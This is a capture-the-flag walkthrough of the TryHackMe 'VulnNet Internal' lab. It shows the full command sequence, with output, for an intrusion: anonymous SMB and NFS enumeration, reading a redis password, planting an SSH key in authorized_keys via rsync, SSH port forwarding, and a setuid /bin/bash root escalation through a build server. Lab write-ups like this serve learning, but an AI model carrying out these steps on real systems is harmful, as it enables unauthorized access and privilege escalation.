[THM] : VulnNet Internal Walkthrough
Initial Recon:
# Nmap 7.92 scan initiated Sun Jan 29 10:53:49 2023 as: nmap -A -Pn -p - -v -oN nmap.txt 10.10.56.112
Nmap scan report for 10.10.56.112
Host is up (0.43s latency).
Not shown: 65074 closed tcp ports (conn-refused), 450 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5e:27:8f:48:ae:2f:f8:89:bb:89:13:e3:9a:fd:63:40 (RSA)
| 256 f4:fe:0b:e2:5c:88:b5:63:13:85:50:dd:d5:86:ab:bd (ECDSA)
|_ 256 82:ea:48:85:f0:2a:23:7e:0e:a9:d9:14:0a:60:2f:ad (ED25519)
111/tcp open rpcbind 2-4 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2,3,4 111/tcp rpcbind
| 100000 2,3,4 111/udp rpcbind
| 100000 3,4 111/tcp6 rpcbind
| 100000 3,4 111/udp6 rpcbind
| 100003 3 2049/udp nfs
| 100003 3 2049/udp6 nfs
| 100003 3,4 2049/tcp nfs
| 100003 3,4 2049/tcp6 nfs
| 100005 1,2,3 37490/udp mountd
| 100005 1,2,3 41143/tcp mountd
| 100005 1,2,3 47340/udp6 mountd
| 100005 1,2,3 58983/tcp6 mountd
| 100021 1,3,4 35212/udp6 nlockmgr
| 100021 1,3,4 35697/tcp6 nlockmgr
| 100021 1,3,4 39500/udp nlockmgr
| 100021 1,3,4 41227/tcp nlockmgr
| 100227 3 2049/tcp nfs_acl
| 100227 3 2049/tcp6 nfs_acl
| 100227 3 2049/udp nfs_acl
|_ 100227 3 2049/udp6 nfs_acl
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
873/tcp open rsync (protocol version 31)
2049/tcp open nfs_acl 3 (RPC #100227)
6379/tcp open redis Redis key-value store
37215/tcp open mountd 1-3 (RPC #100005)
41047/tcp open mountd 1-3 (RPC #100005)
41143/tcp open mountd 1-3 (RPC #100005)
41227/tcp open nlockmgr 1-4 (RPC #100021)
Service Info: Host: VULNNET-INTERNAL; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: vulnnet-internal
| NetBIOS computer name: VULNNET-INTERNAL\x00
| Domain name: \x00
| FQDN: vulnnet-internal
|_ System time: 2023-01-29T06:50:34+01:00
|_clock-skew: mean: -10m31s, deviation: 34m37s, median: 9m27s
| nbstat: NetBIOS name: VULNNET-INTERNA, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| VULNNET-INTERNA<00> Flags: <unique><active>
| VULNNET-INTERNA<03> Flags: <unique><active>
| VULNNET-INTERNA<20> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
|_ WORKGROUP<1e> Flags: <group><active>
| smb2-time:
| date: 2023-01-29T05:50:34
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 29 11:26:19 2023 -- 1 IP address (1 host up) scanned in 1949.47 secondsFirst I used smbclient to list shares and connected to “shares” share abusing SMB Null session vulnerability.
smbclient -L ///10.10.56.112
Enter WORKGROUP\suvam's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
shares Disk VulnNet Business Shares
IPC$ IPC IPC Service (vulnnet-internal server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
I used showmount tool to see if any shares can be mounted.
sudo showmount -e 10.10.60.45
[sudo] password for suvam:
Export list for 10.10.60.45:
/opt/conf *We can see every machine on this network is allowed to mount /opt/conf. So I mounted the share on my tmp directory.
mount -t nfs 10.10.228.119:/opt/conf /tmp/vulnnet/
The redis directory contained the redis password. Now we can login to redis server using the password.
redis-cli -h 10.10.228.119 -p 6379 -a "PASSWORD"
10.10.228.119:6379> KEYS *
1) "tmp"
2) "marketlist"
3) "int"
4) "authlist"
5) "internal flag"The authlist had a base64 encoded message. Decoding the message gave credentials for rsync.
Rsync is a command-line tool for copying files and directories between local and remote systems. I used the following command to list the files and copied files from remote server to my machine.
rsync -av --list-only rsync://10.10.228.119:873
files Necessary home interactionrsync -av rsync://rsync-connect@10.10.228.119:873/files ./filesNow, we can upload our ssh public key to authorized_keys file to remote server and ssh as suer sys-internal.
rsync -av /home/suvam/.ssh/id_rsa.pub rsync://rsync-connect@10.10.228.119/files/sys-internal/.ssh/authorized_keys
Password:
sending incremental file list
id_rsa.pub
sent 673 bytes received 35 bytes 56.64 bytes/sec
total size is 563 speedup is 0.80
I tried ooking for running ports onthe system using netstat but netstat wasn’t installed on the system. I used an alternative tool ss.
ss -tnoWe can see that port 2049 is open. We now have to port forward it using ssh.
sys-internal@vulnnet-internal:~$ ss -tno
State Recv-Q Send-Q Local Address:Port Peer Address:Port
ESTAB 0 0 10.10.228.119:2049 10.4.13.245:883
ESTAB 0 36 10.10.228.119:22 10.4.13.245:55126 timer:(on,612ms,0)
ESTAB 0 0 10.10.228.119:6379 10.4.13.245:50534 timer:(keepalive,2min47sec,0)
CLOSE-WAIT 1 0 [::ffff:127.0.0.1]:50187 [::ffff:127.0.0.1]:8111
ESTAB 0 0 [::ffff:127.0.0.1]:8111 [::ffff:127.0.0.1]:56273
ESTAB 0 0 [::ffff:127.0.0.1]:56273 [::ffff:127.0.0.1]:8111 Port Forwarding with SSH
ssh -L 3434:127.0.0.1:2049 sys-internal@10.10.228.119
The application redirects to he login page. After digging a while, I found the login super user token and logged in.
First I created a project.
Then I choosed build step and selected Command Line.
Then I added setuid bit on /bin/bash through Command Line and ran the project.
After that I got shell as root.
/bin/bash -p
![[THM] : Badbyte Walkthrough](https://miro.medium.com/v2/resize:fit:679/1*v6EhuCQYdZsjYIrZ4TlgGQ.png)
